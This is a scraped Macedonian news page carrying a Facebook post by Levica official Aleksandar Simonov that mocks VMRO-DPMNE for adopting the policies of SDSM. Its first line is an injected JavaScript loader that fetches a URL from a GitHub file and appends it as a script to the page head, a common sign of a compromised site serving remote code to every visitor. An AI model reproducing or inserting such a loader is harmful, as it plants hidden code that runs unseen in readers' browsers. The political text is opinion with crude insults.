;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Симонов: ДПМНЕ е исфрустрирано од самото себе, од тоа што станаа СДС - Антропол
АктуелноЛокалноСтав

Симонов: ДПМНЕ е исфрустрирано од самото себе, од тоа што станаа СДС

  • Фејсбук статус на Александар Симонов – Член на Президиумот на Левица

Тие не се исфрустрирани од Левица, тие се исфрустрирани од самите себе. Тоа што 8 години сте го плукале во опозиција, да го излижеш за 4 месеци во власт, не е лесно. Ајде и излижанлто не им е проблем да го голтнат некако, ама проблемот се раѓа кога некој трет те соочува со тоа, дека лижеш и голташ, ама баш све што си исплукал.

СДС изгубија образ од одамна, а овие го губат сега и нагло, оти нели, не е лесно да хвалоспеваш се она што си вулгаризирал.

Замисли колку е тешко на говорница да кажеш ја поддржав Шекеринска затоа што е од Македонија, додека истата таа Шекеринска го менувала името Македонија, а ти као нешто си се борел против тоа. Онака како оној кумановецот што му е во коалиција – Максо, човекот што се повикува на АСНОМ, а сам гласаше за бришење на АСНОМ од уставот.

Или со години да збориш како историската комисија не треба да постои, затоа што го продавала иденитетот, и оп наеднаш, да назначуваш луѓе и да двоиш од буџет за истата таа историска комисија. После, шефе шо да направиме, ај ќе праиме провокација, па инцидент и да го вулгаризираме процесот, па нека се збори за инцидентот, не за тоа што го правиме.

И Северна, и балансер, и албанска академија, и Бехтел и Енка, и двојазичен парламент, и враќање на документи затоа што не пишува Северна, и менувајте возачки до нова година, и ревидираните учебници останаа и што уште не. И така, ВМРО стана, се што се ветија дека нема да бидат, ВМРО стана пандан на СДС-овската политика, за само неколку месеци.